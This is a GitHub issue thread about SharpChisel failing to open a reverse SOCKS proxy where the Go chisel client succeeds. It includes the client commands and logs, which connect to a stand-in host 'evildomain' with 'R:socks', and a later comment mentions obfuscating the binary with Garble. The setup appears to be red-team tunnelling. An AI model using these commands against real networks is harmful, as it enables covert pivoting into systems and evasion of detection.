Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Socks failing #1

Open
mubix opened this issue Oct 29, 2020 · 4 comments
Open

Socks failing #1

mubix opened this issue Oct 29, 2020 · 4 comments

Comments

@mubix
Copy link

mubix commented Oct 29, 2020

I was able to us the Go binary:

C:\temp\> chisel.exe client --auth user:pass https://evildomain R:socks
2020/10/29 13:06:01 client: Connecting to wss://evildomain:443
2020/10/29 13:06:01 client: Fingerprint SNIPPED
2020/10/29 13:06:01 client: Connected (Latency 62.3573ms)

But with SharpChisel I get this:

SharpChisel.exe client --auth user:pass https://evildomain R:socks
[client --auth user:pass https://evildomain R:1080:socks]
2020/10/29 13:06:43 client: Connecting to wss://evildomain:443
2020/10/29 13:06:44 client: Fingerprint SNIPPED
2020/10/29 13:06:44 client: server: Server cannot listen on R:127.0.0.1:1080=>socks

I restarted the server both times just to make sure there wasn't lingering connections. Both runs are from the same machine. Not sure what's going wrong here.

@mubix
Copy link
Author

mubix commented Oct 29, 2020

I've tested compiling myself as well as using the release version

@mubix
Copy link
Author

mubix commented Oct 29, 2020

Oddly enough I've getting a similar issue when using Garble - https://github.com/burrowers/garble to obfuscate the binary

@m3rcer
Copy link

m3rcer commented May 7, 2022

Facing the same issue...

@m3rcer
Copy link

m3rcer commented May 7, 2022

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants